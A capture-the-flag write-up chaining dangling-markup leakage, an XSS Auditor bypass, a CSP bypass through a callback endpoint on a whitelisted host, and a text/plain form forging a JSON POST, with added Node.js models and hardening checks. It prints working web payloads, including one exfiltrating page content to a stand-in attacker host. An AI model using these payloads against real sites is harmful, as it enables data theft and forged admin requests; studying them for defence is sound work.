
Bypasses Everywhere - writeup

Dangling markup - leaking the source code

At we are told that if this page is accessed from we should be able to see more interesting content.

On the same page there is a vulnerable parameter, `picture`, which leads to a dangling markup attack: `"><img src='`

By submitting this URL to the "admin" we can leak the hidden content: `POST ; ; data: "url="><img src='"`

Soon enough our server receives the content of the server-files/ file: the injected `src='` attribute is never closed, so everything that follows it in the page, up to the next single quote, becomes part of the image URL that the admin's browser requests from our server.
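As an added example (not code from the original write-up), the following Node.js script models what the `"><img src='` payload does to a page that reflects `picture` unescaped: a tiny attribute scanner applies the HTML tokenizer rule that a quoted value runs until the same quote reappears, and shows the hidden text riding out in the image URL. The page template, the `SECRET-1234` text and the `https://attacker.example/` hostname are constructed for the example; a hardened renderer that escapes the attribute is shown beside the vulnerable one.

```javascript
// Added example, not code from the original write-up: a model of how the
// dangling `<img src='` payload drags the page's hidden content into a URL.
// The page template, the secret text and the attacker hostname are constructed.
const ATTACKER = "https://attacker.example/";   // hypothetical collection server

// Simplified vulnerable template: `picture` is reflected unescaped inside a
// double-quoted src attribute, and the hidden content follows it in the page.
function renderPage(picture) {
  return [
    `<img src="${picture}" alt="avatar">`,
    "<p>Only visible from localhost: the admin secret is SECRET-1234</p>",
    "<a href='/logout'>logout</a>",
  ].join("\n");
}

// Hardened variant: escape every character that can end an attribute or start a tag.
function htmlAttrEscape(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/'/g, "&#39;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}
function renderPageHardened(picture) {
  return renderPage(htmlAttrEscape(picture));
}

// Minimal attribute scanner implementing the tokenizer rule that matters here:
// a quoted attribute value runs until the same quote character appears again,
// no matter how many tags, newlines or other quotes lie in between.
// Returns the src value of each <img> in document order (null if it has none).
function imgSrcs(html) {
  const out = [];
  let i = 0;
  while ((i = html.indexOf("<img", i)) !== -1) {
    i += 4;
    let src = null;
    while (i < html.length && html[i] !== ">") {          // attribute loop
      if (/\s/.test(html[i])) { i++; continue; }
      let name = "";
      while (i < html.length && !/[\s=>]/.test(html[i])) name += html[i++];
      while (i < html.length && /\s/.test(html[i])) i++;
      let value = "";
      if (html[i] === "=") {
        i++;
        while (i < html.length && /\s/.test(html[i])) i++;
        const q = html[i];
        if (q === '"' || q === "'") {
          const end = html.indexOf(q, i + 1);             // wherever the next matching quote is
          value = html.slice(i + 1, end === -1 ? html.length : end);
          i = end === -1 ? html.length : end + 1;
        } else {
          while (i < html.length && !/[\s>]/.test(html[i])) value += html[i++];
        }
      }
      if (name.toLowerCase() === "src" && src === null) src = value;
    }
    out.push(src);
  }
  return out;
}

// What the attacker's server would receive: the first img whose src points at it.
function leakedUrl(picture, render = renderPage) {
  return imgSrcs(render(picture)).find(s => s !== null && s.startsWith(ATTACKER)) ?? null;
}

const PAYLOAD = `"><img src='${ATTACKER}`;   // the write-up's payload with the hostname filled in
console.log("leaked:", JSON.stringify(leakedUrl(PAYLOAD)));
console.log("hardened:", leakedUrl(PAYLOAD, renderPageHardened));
```

The leaked value still contains the raw newlines and tags between the two quotes; browsers strip tab and newline characters from URLs before sending, and current Chromium additionally refuses to load a resource whose URL contains both a newline and `<`, which is why this vector depends on the older headless build the challenge used.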


Now we know that our goal is to POST a JSON payload to the /article endpoint.

To do this we will need an XSS. The injection we have on is not sufficient because the "admin" is actually a headless Chromium browser (you can see it in the User-Agent header), so the XSS Auditor blocks the injection (at least I don't know any bypass; please tell me if I'm wrong on twitter: @HugoDelval). Note that the XSS Auditor has since been removed from Chromium entirely (as of Chrome 78), so this step only matters for older builds like the one the challenge ran.

Another endpoint, /article, is also vulnerable to XSS. Its specificity is that two parameters are reflected, which leads to an XSS Auditor bypass, since the auditor only blocks an inline script that it can find as a single reflected string in the request: `<script>al&unit=ert()</script>`


The previous XSS bypass would normally work, BUT the website is also protected by a CSP: script-src: Which means that our payload, which could have done the POST we want to fetch the flag, won't work here, because inline scripts are not allowed by that policy. If you open the developer console in Chromium at `<script>al&unit=ert()</script>` you'll see the error.

Luckily, CSP can be bypassed (wow, really? you didn't see it coming, right?). Here is a really good paper about this:

The only URL endpoint I've found on the subdomain allowed by the CSP is this one: (again, if you have others I would love to know :D). Which means that our previous XSS payload can be written as a script loaded from that endpoint: `<script src=https://ww>&></script>`

\o/ Hurray! XSS!
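To show the CSP-bypass step above in working code, here is an added example (not code from the original write-up, and not the challenge's real policy or endpoint): a simplified model of a host-whitelisting `script-src` and of a callback endpoint on the allowed host that echoes its `callback` parameter into JavaScript. The policy, the host names `app.example.com` / `cdn.example.com`, the `/api.js` endpoint and the `callback` parameter are all constructed for the illustration; the callback value `document.forms[0].submit` mirrors the `[0].submit` fragment visible in the write-up's final payload.

```javascript
// Added example, not code from the original write-up: a simplified model of
// a host-whitelisting script-src and of why an endpoint on an allowed host that
// echoes a callback name into JavaScript defeats it. The policy, the host
// names and the endpoint are constructed for illustration; the challenge's
// real whitelist and endpoint are not reproduced here.
const POLICY = "default-src 'none'; script-src 'self' https://cdn.example.com";
const PAGE_ORIGIN = "https://app.example.com";
const CALLBACK_SCRIPT_URL =
  "https://cdn.example.com/api.js?callback=document.forms[0].submit";

// Parse a CSP header into {directive: [source expressions]}.
function parseCsp(header) {
  const out = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) out[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return out;
}

// Does a host-style source expression (https://cdn.example.com, *.example.com,
// https:) match the script URL `u`? Ports and paths are ignored in this model.
function sourceMatches(expr, u) {
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return u.protocol === expr.toLowerCase();
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)/i.exec(expr);
  if (!m) return false;
  const [, scheme, host] = m;
  if (scheme && u.protocol !== scheme.toLowerCase() + ":") return false;
  const h = host.toLowerCase();
  return h.startsWith("*.") ? u.hostname.endsWith(h.slice(1)) : u.hostname === h;
}

// Allow/deny decision for one script element: inline needs 'unsafe-inline',
// external needs 'self' or a matching host source.
function scriptAllowed(policy, pageOrigin, script) {
  const csp = parseCsp(policy);
  const sources = csp["script-src"] || csp["default-src"] || [];
  if (script.inline) return sources.includes("'unsafe-inline'");
  const u = new URL(script.src);
  return sources.some(expr => {
    if (expr === "'self'") return u.origin === pageOrigin;
    if (expr.startsWith("'")) return false;      // other keywords never match a URL
    return sourceMatches(expr, u);
  });
}

// Hypothetical callback endpoint on the allowed host: it echoes the `callback`
// query parameter verbatim in front of its JSON payload.
function jsonpEndpoint(requestUrl) {
  const cb = new URL(requestUrl).searchParams.get("callback") || "handle";
  return `${cb}({"status":"ok"});`;
}

// Hardened endpoint check: only a dotted identifier path may be a callback, so
// `document.forms[0].submit` (anything with brackets, parens or quotes) is refused.
function safeCallback(cb) {
  return /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/.test(cb);
}

// Run the returned script against a fake document to show what it would do in
// the admin's page: the "JSON" becomes the argument of document.forms[0].submit().
function runWithFakeDocument(js) {
  const calls = [];
  const fakeDocument = { forms: [{ submit: () => calls.push("submit") }] };
  new Function("document", js)(fakeDocument);
  return calls;
}

console.log("inline blocked:", !scriptAllowed(POLICY, PAGE_ORIGIN, { inline: true }));
console.log("whitelisted src allowed:", scriptAllowed(POLICY, PAGE_ORIGIN, { src: CALLBACK_SCRIPT_URL }));
console.log("response:", jsonpEndpoint(CALLBACK_SCRIPT_URL));
console.log("effect:", runWithFakeDocument(jsonpEndpoint(CALLBACK_SCRIPT_URL)));
```

The point of the model is that the policy never looks at what the allowed host serves: any endpoint there that reflects attacker-controlled text into a JavaScript body hands the attacker a script the browser will happily run. Real CSP matching also compares ports and path prefixes, which this model skips; the durable fix is a nonce- or hash-based policy (with `'strict-dynamic'`) instead of a host whitelist, plus a strict callback validator like `safeCallback` on any JSONP-style endpoint.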

Posting "JSON"

The last step is to post a JSON-like payload to the /admin endpoint. Here is how I did it:

	<form method=post enctype=text/plain>
		<input name='{"secret":"No one will never ever access this beauty","url":"","a":"' value='"}'>
	</form>

Which will post (with enctype=text/plain the browser sends each field as name=value, so the `=` it inserts lands inside the last string):

	{
		"secret": "No one will never ever access this beauty",
		"url": "",
		"a": "="
	}
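As an added example (not code from the original write-up), the following Node.js script reproduces the `enctype=text/plain` trick end to end: it encodes the form field exactly as the browser does (`name=value` followed by CRLF, no percent-encoding), parses the result as a lenient JSON endpoint would, and shows the server-side check that stops it. The `https://attacker.example/` URL stands in for the write-up's stripped value, and the request headers are constructed.

```javascript
// Added example, not code from the original write-up: how a cross-site form with
// enctype=text/plain produces a body that parses as JSON, and the server-side
// check that defeats it. The field layout reproduces the write-up's trick; the
// URL value and the sample request headers are constructed placeholders.

// text/plain form encoding: each field becomes `name=value` followed by CRLF,
// with no percent-encoding of either side (unlike x-www-form-urlencoded).
function encodeTextPlain(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join("");
}

// The single field from the write-up: the name holds the start of the JSON
// object, the value its end; the `=` the browser inserts becomes the value of "a".
const FIELDS = [[
  '{"secret":"No one will never ever access this beauty","url":"https://attacker.example/","a":"',
  '"}',
]];

// Build the body and parse it the way a JSON endpoint that ignores the
// Content-Type header would (the trailing CRLF is JSON whitespace).
function forgedJson(fields = FIELDS) {
  return JSON.parse(encodeTextPlain(fields));
}

// Hardening: an HTML form can only produce application/x-www-form-urlencoded,
// multipart/form-data or text/plain, and cannot set custom headers. Requiring
// application/json plus a custom header (which forces a CORS preflight from
// scripts) means no cross-site form submission reaches the JSON handler.
function acceptsJsonRequest(headers) {
  const ct = (headers["content-type"] || "").split(";")[0].trim().toLowerCase();
  return ct === "application/json" && headers["x-requested-with"] === "XMLHttpRequest";
}

// Constructed sample requests: what the forged form sends vs. a legitimate client.
const FORM_REQUEST = { "content-type": "text/plain", body: encodeTextPlain(FIELDS) };
const API_REQUEST = {
  "content-type": "application/json; charset=utf-8",
  "x-requested-with": "XMLHttpRequest",
  body: JSON.stringify({ secret: "s", url: "u", a: "" }),
};

console.log("body:", JSON.stringify(FORM_REQUEST.body));
console.log("parsed:", forgedJson());
console.log("form accepted:", acceptsJsonRequest(FORM_REQUEST));
console.log("api accepted:", acceptsJsonRequest(API_REQUEST));
```

Marking the session cookie `SameSite=Lax` or `Strict` is the other half of the fix: the forged form is a cross-site POST, so the admin's cookie would not be attached and the /admin endpoint would see an unauthenticated request.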

Wrapping it all together

To solve this challenge we need to submit this URL to the admin: `<form method=post enctype=text/plain><input name='{"secret":"No one will never ever access this beauty","url":"","a":"' value='"}'></form><script src=https://ww&[0].submit></script>`

Which will:

  1. Fetch the page on the local URL (the headless Chromium admin is running on localhost)
  2. Bypass the Chrome XSS Auditor (splitting the payload into 2 URL parameters)
  3. Bypass the CSP using
  4. Post a JSON payload using the enctype=text/plain trick


Thanks for reading.

I hope this writeup is clear enough :) If not, please reach out -> twitter: @HugoDelval